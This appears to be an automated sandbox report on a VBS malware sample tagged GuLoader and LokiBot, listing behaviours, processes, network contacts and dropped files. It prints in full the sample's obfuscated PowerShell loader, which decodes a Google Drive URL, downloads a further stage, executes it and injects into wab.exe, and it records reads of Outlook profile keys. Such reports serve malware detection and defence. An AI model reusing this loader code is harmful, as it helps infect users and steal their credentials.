Malware Analysis Report

2025-04-03 09:48

Sample ID 240329-cmsnhafe22
Target 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
SHA256 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
Tags
guloader lokibot collection downloader spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612

Threat Level: Known bad

The file 43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs was found to be: Known bad.

Malicious Activity Summary

guloader lokibot collection downloader spyware stealer trojan

Lokibot

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Program crash

Suspicious use of AdjustPrivilegeToken

outlook_win_path

Suspicious behavior: EnumeratesProcesses

outlook_office_path

Suspicious use of WriteProcessMemory

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 02:11

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-29 02:11

Reported

2024-03-29 02:14

Platform

win7-20240221-en

Max time kernel

156s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Lokibot

trojan spyware stealer lokibot

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1756 set thread context of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2820 wrote to memory of 1388 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 2244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1388 wrote to memory of 1756 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2332 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 1756 wrote to memory of 2488 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Program Files (x86)\windows mail\wab.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c set /A 115^^0

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
GB 142.250.187.238:443 drive.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp
US 140.82.61.49:80 140.82.61.49 tcp

Files

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 c182cc2051a1f2cb0f78364db81b9fc1
SHA1 afef4d6a4f66aa307df4ed1179256d4667444585
SHA256 5e29ffa5f6109f87e5d4205a591bbc8fcb529e3643462f6487b5479eb46d79be
SHA512 40b2d28acdfa3eda9997c385a67e86c0a120e1a12cc3c51ff2d649c262f458089be88c63ac042b43fed19386e6664bba6a632db67357f71f53c4719f30b37eac

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 8554355ff9009da1b1c8536a9bb2e2fd
SHA1 539aef5de341d53a43fa26a2d5e6ddd7f82a508d
SHA256 aa4e604ec667d549b72c32b33e76269b0cdabc5c747b67889e7bfad238760d39
SHA512 256472a8fa9f1381fedf8ed14858786f63ed4fa176eb5940abf5d90dc2547356458a9cbf5ec39de949e7a79c698fe91c708ebd8114d759d310c9f308e44bdb94

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 e55e9d1ae5fe8f525a35539ef7cb8a26
SHA1 eae2cc90fe2fff8c8391a4ba827aa06064c729bc
SHA256 4a45982b8c4124238f30262f24e37fd9dd3461728376854a3b7efb0fadc7c585
SHA512 bfebd15265f78a76f237c2bd695b813f0580cece1a53ca61291011c1edfa8845e2e436ea609b3cfb4be94001106ec8373438dc8483656ba33209db29c815cf89

C:\Users\Admin\AppData\Local\Temp\Preeducated.txt

MD5 41077e923293898955e78267b7878339
SHA1 36083128a00b83103bfe8bc36b0042ff6a703012
SHA256 4d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
SHA512 070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922

memory/1388-298-0x000000001B290000-0x000000001B572000-memory.dmp

memory/1388-300-0x0000000002420000-0x0000000002428000-memory.dmp

memory/1388-299-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

memory/1388-301-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-302-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-303-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-304-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

memory/1388-305-0x0000000002450000-0x00000000024D0000-memory.dmp

memory/1388-306-0x00000000029A0000-0x00000000029C2000-memory.dmp

memory/1388-307-0x0000000002840000-0x0000000002852000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM8DQYYW9H7S7EBS6TKR.temp

MD5 1af72430a9d0a1b2bbd984d5e23e81aa
SHA1 bf5d0480b4dc3bb98d8b439fe71af29058f4baf8
SHA256 35df3e1bc498ec96e4c32c1185b5fa898b27336db00fe71d26f118cff3ed0ce3
SHA512 65904ba5927e73ee66ba5545ef3d74605e343838883a89402f594246ecb1ccc2e38cab39279eacf0751b440d5b4ae6779cb0e9ff25db959d12eae571f1fe3e06

memory/1756-310-0x0000000073080000-0x000000007362B000-memory.dmp

memory/1756-311-0x0000000002640000-0x0000000002680000-memory.dmp

memory/1756-312-0x0000000073080000-0x000000007362B000-memory.dmp

memory/1388-313-0x000007FEF54C0000-0x000007FEF5E5D000-memory.dmp

memory/1756-314-0x0000000002640000-0x0000000002680000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBDD3.tmp

MD5 29f65ba8e88c063813cc50a4ea544e93
SHA1 05a7040d5c127e68c25d81cc51271ffb8bef3568
SHA256 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
